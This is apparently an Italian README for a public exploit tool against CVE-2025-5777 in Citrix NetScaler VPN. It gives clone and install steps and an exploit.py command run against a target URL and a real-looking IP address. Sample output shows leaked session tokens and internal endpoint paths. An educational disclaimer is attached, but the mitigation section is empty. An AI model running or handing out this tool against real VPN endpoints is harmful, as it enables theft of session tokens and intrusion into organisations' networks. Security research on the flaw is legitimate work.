
Un potente strumento didattico progettato per dimostrare e analizzare la vulnerabilità CVE-2025-5777 che colpisce Citrix NetScaler VPN.
Questo progetto fa parte dell'iniziativa GO-TO CVE.
⚠️ Solo per scopi educativi. NON utilizzare questo strumento su sistemi che non possiedi o per i quali non hai esplicita autorizzazione al test.
Questo script tenta di rilevare ed estrarre token interni sensibili, IP interni e percorsi di endpoint nascosti esposti da endpoint VPN Citrix vulnerabili.
È stato creato per aiutare studenti, ricercatori di sicurezza e membri di red team a comprendere meglio come i CVE reali vengono scoperti e analizzati.
git clone https://github.com/soltanali0/CVE-2025-5777-Exploit.git
cd CVE-2025-5777-Exploit
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt
Richiede Python 3.8+ Opzionale: Puoi usare un ambiente virtuale
python3 exploit.py https://target-vpn.com
--proxy http://127.0.0.1:8080 per instradare tramite Burp/SOCKS--silent per sopprimere l'output--output result.json per salvare in JSONEsempio:
python3 exploit.py https://20.237.190.100 --output leaks.json
[!] Leak analysis:
→ Tokens found: ZWZlNjViZDA4NThj...
→ Paths found: /nf/auth/doLogoff.do, /nf/auth/doEPA.do, /Credential
e
Per evitare lo sfruttamento di questo CVE:
Questo strumento è rilasciato esclusivamente per scopi educativi e di ricerca legittima. Lo sviluppatore non si assume alcuna responsabilità per qualsiasi uso improprio o attività illegale condotta con questo codice.
Usando questo strumento, accetti che:
Unisciti alla community di ricerca su leak CVE e exploit: 👉 https://t.me/GOTOCVE
Sviluppato da Ali Soltani – red teamer e cacciatore di CVE.
Orgogliosamente parte di GO-TO CVE